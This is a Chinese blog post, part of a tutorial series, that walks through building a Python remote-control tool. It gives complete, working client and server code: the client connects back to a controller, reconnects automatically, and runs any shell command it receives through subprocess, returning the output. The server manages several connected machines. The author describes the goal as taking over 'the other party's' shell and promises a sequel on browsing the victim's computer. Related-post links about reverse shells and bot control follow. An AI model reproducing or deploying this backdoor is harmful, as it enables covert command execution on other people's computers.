python远控

最新推荐文章于 2024-09-04 10:32:47 发布
最新推荐文章于 2024-09-04 10:32:47 发布
阅读量899 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: python 网络安全 tcp/ip
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_51651901/article/details/127918948

上一篇文章呢,详细的交大家如何去写远控的核心,没有看的小伙伴可以点击括号里面的内容传送过去看一看(python远控

这一篇文章我们接着完成上一篇的代码,功能代码,就简单的写一个获取对方shell的代码(dos窗口的控制权限)

我们这边使用python打包好的subprocess这个模块,首先我们先来看一下这个模块的用法

import subprocess
shell=subprocess.Popen("ipconfig",shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
shell.wait()
STDOUT,STDERR=shell.communicate()
print(STDOUT.decode('cp936'))

这边就说两个地方,关于这个模块的详情用法大家可以自行百度,接重点大家看括号里面的第一个参数ipconfig,相信熟悉dos窗口的小伙伴应该就恍然大悟了吧,没错这就是一条指令查看我们电脑ip的,后面那个shell=True执行该命令,为false不执行,这边我就不在给大家截图了,感兴趣的小伙伴可以自己自行的去运行一下。

这个时候大家想一下我们上一片文章不是写了一个传输指令的代码,想要远程执行命令,我们是不是之需要把这个代码里面的ipconfig替换成我们远程发送过来的,然后再将执行后得到的结果传输回去,思路有了,那我们继续完善我们的代码。

#客户端
import socket
import os
import time
import subprocess
def link():#连接函数
   try:
       s=socket.socket()
       s.connect(('127.0.0.1',9999))
       tcpclie(s)
   except:
       print('断线,5秒后重新连接')
       time.sleep(5)
       link()
def tcpclie(s):#接收信息
   while True:
       try:
           data=s.recv(1024).decode('utf-8')
           if data.split('_')[0]=='cmd':#cmd命令,
               shell = subprocess.Popen(data.split('_')[1], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE)
               shell.wait()
               STDOUT, STDERR = shell.communicate()
               s.send(STDOUT.decode('cp936').encode('utf-8'))
           elif data.split('_')[0]=='cd':
               cdmuli = data.split('_')[1]
               try:
                   os.chdir(cdmuli)
                   s.send(os.getcwd().encode('utf-8'))
               except:
                   s.send('切换失败'.encode('utf-8'))
           else:
               s.send('未知指令'.encode('utf-8'))
       except:
           s.close()
           link()
if __name__=='__main__':
    link()

服务端稍有改动

# 服务端
from socket import *
import threading
import time

s = socket(AF_INET, SOCK_STREAM)
s.bind(('127.0.0.1', 9999))
s.listen(10)
data_list = []  # 存放机器


def run():
    while True:
        clientsock, clientaddress = s.accept()
        print(clientsock)
        if clientsock not in data_list:  # 判断连接的机器是否在列表里面
            data_list.append(clientsock)  # 不在的话写入
        threading.Thread(target=tcplink, args=(clientsock,)).start()  # 开启一个线程


def tcplink(sock):  # 接收客户端发送的消息
    while True:
        try:
            recvdata = sock.recv(1024).decode('utf-8')
            print(recvdata)
        except:
            break


def post():  # 指令
    global da_data
    while True:
        try:
            time.sleep(1)
            in_data = input('请输入>>>')
            da_data = int(in_data.split('_')[2])  # 指定对应的机器第一个为0,语法为:指令_内容_机器编号,列如cmd_dir_0表示查看第一台机器的当前目录
            s = data_list[da_data]
            s.sendall(in_data.encode('utf-8'))
        except:
            print('该客户端已下线')
            data_list.pop(da_data)
            print('以移除该客户端')


if __name__ == '__main__':
    threading.Thread(target=run, args=()).start()
    threading.Thread(target=post,args = ()).start()

在客户端的代码里面我添加了一个快速换盘的指令,下面来看一下运行效果

先看cmd的效果

成功获取客户端的目录,在看下cd快速换盘

 

 

好了,下篇文章来教大家如何获取对方(让我看看你的电脑有什么好看的),本期就到这里,关注点点,下次不迷路 

千里&千寻
关注
pythondecode和encode
zaygee的博客
04-06 1201
1.常见的字符编码:unicode、utf-8、gbk(windows默认编码) 2.什么是unicode: 它为每种语言中的每个字符设定了统一并且唯一的二进制编码,以满足跨语言、跨平台进行文本转换、处理的要求。Unicode 编码共有三种具体实现,分别为utf-8,utf-16,utf-32,其中utf-8占用一到四个字节,utf-16占用二或四个字节,utf-32占用四个字节[来自百度百科...
python关于编码转码问题
浮世的博客
09-29 1908
python关于编码转码问题 python在安装时,默认的编码是ascii,当程序中出现非ascii编码时,python的处理常常会报这样的错UnicodeDecodeError: ‘ascii’ codec can’t decode byte 0x?? in position 1: ordinal not in range(128),python没办法处理非ascii编码的,此时需要自己设置将python的默认编码,一般设置为utf8的编码格式。 文章目录python关于编码转码问题一、基础二、使用步骤
Python3输出中文乱码解决方案之编码格式转换
梦回故里
12-31 2044
Python3输出中文乱码解决方案之编码格式转换解决方案 解决方案 # 通过 sys.stdout.encoding 可以查询当前是什么编码格式 #print("sys.stdout.encoding", sys.stdout.encoding) #decode("utf-8"),有可能会出现错误,方法的第二个参数errors为严格(strict)形式造成,因为默认就是这个参数,将其更改为ignore就可以解决 return "字符内容".encode('utf-8').decode("utf-8", "i
合并 Python 脚本的子进程的 stdout 和 stderr,同时保持它们可区分
07-05 408
要合并子进程的stdout和stderr,同时保持它们可区分,我们可以使用`Popen`对象中的`communicate()`方法。这个方法会返回一个元组,第一个元素是标准输出,第二个元素是标准错误输出。在这个示例中,我们首先创建了一个子进程,该子进程是运行`ls -l`命令的。最后,我们打印出标准输出和错误输出。如果是,那么它就是错误输出,我们将错误输出添加到`error`变量中。然后,我们将标准输出和错误输出分开,并打印它们。请注意,这些示例假设你的子进程不会生成大量的输出,否则可能会消耗大量的内存。
odoo中,使用paramiko库ssh连接Linux,我在美团网络安全研发岗工作的那5年
m0_56175058的博客
04-08 238
【代码】odoo中,使用paramiko库ssh连接Linux,我在美团网络安全研发岗工作的那5年。
地狱修炼之路—Python领域!
qq_43606723的博客
08-18 389
文章内容仅用于技术交流学习,禁止用于非法用途,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果,均由使用者本人负责,文章作者不为此承担任何责任。基于Python网络编程。.........
python桌面
10-03
Python桌面是一种利用Python编程语言开发的工具或程序,用于制和操作程计算机的桌面环境。 Python桌面通常通过网络连接实现。用户使用一台计算机作为制端,运行Python桌面程序,并将其连接到...
红队作业 | Python实现免杀
Ms08067安全实验室
12-03 977
文章来源|MS08067 红队培训班 第4期本文作者:学员A(红队培训班4期学员)按老师要求尝试完成布置的作业如下:要想实现简易,说的详细点就是反弹shell,首先要解决三个问题:1....
python搭建制软件源代码
07-21
用一台电脑制另一台电脑,Python的代码。类似teamviewer直接程操作,分为客户端和服务端
知道我另一个手机的Mac地址和ip地址,并且和我这个手机在同一wifi下,但是其他密码都忘了,如何用这部苹果手机用python与获取文件
最新发布
06-17
方案二(非越狱)的Python实现:我们可以使用libimobiledevice的Python绑定,例如pymobiledevice(但注意该库可能不完整)或直接使用subprocess调用命令行工具。例如,使用ifuse挂载iPhone文件系统(需要安装ifuse)...
python—paramiko模块
shang_feng_wei的博客
06-11 428
什么是paramiko paramiko是一个基于ssh用于做制的模块,使用该模块可以对程服务器进行命令或文件操作 1、paramiko程密码连接 1 import paramiko # 导入模块 2 client = paramiko.SSHClient() # 创建一个ssh对象,使用变量client 接收 3 client.set_missing_host_key_policy...
Python中subprocess模块的decode方法详解
Leon_Jinhai_Sun的博客
09-04 352
Python中subprocess模块的decode方法详解
python调用linux命令输出结果,Python-运行shell命令并捕获输出
weixin_36145472的博客
05-14 810
小编典典这个问题的答案取决于你使用的Python版本。最简单的方法是使用以下subprocess.check_output功能:>>> subprocess.check_output(['ls', '-l'])b'total 0\n-rw-r--r-- 1 memyself staff 0 Mar 14 11:04 files\n'该check_output功能适用于仍在广...
python调用系统命令行
测试小胖的博客
08-24 929
【代码】python调用系统命令行。
python执行命令行
xiejunna的博客
09-14 5793
我这里用到了subprocess.Popen()和subprocess.run() 执行ping命令示例如下: # -*- coding: utf-8 -*- import os import subprocess import re import sys def get_ping(ip, count): platform = sys.platform command = 'ping -n %s' % count + " %s" % ip print(command)
小案例:利用Python获取Windows电脑WiFi密码
采菊东篱下,Python满乾坤!
07-19 2099
电脑上忘记wifi密码,直接用命令行便可查看所有的wifi密码。
Python3 实现可制肉鸡的反向Shell
git1314的博客
09-29 930
Python3 实现可制肉鸡的反向Shell 一、初识 1.1 用 Python 实现一个可以管理多个肉鸡的反向 Shell,为什么叫反向 Shell 呢?反向就是肉鸡作为Client主动连接到我们的Server端,以实现对多个程主机的管理! 学习技能: 了解TCP协议 了解C/S结构程序设计 Python socket模块的使用 Python subprocess模块的...
Python(三)模块使用部分2——常用的模块
天才小楼楼
05-23 1234
阅读目录: 一、time模块 二、datetime模块 三、random模块 四、os模块 五、sys模块 六、shutil模块 七、shelve模块 八、suprocess 模块 九、paramiko模块 十、configparser模块 十二、logging模块 十三、序列化模块json&pickle模块 十四、hash模块 十五、正则模块re 一、time模块,时间的三...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值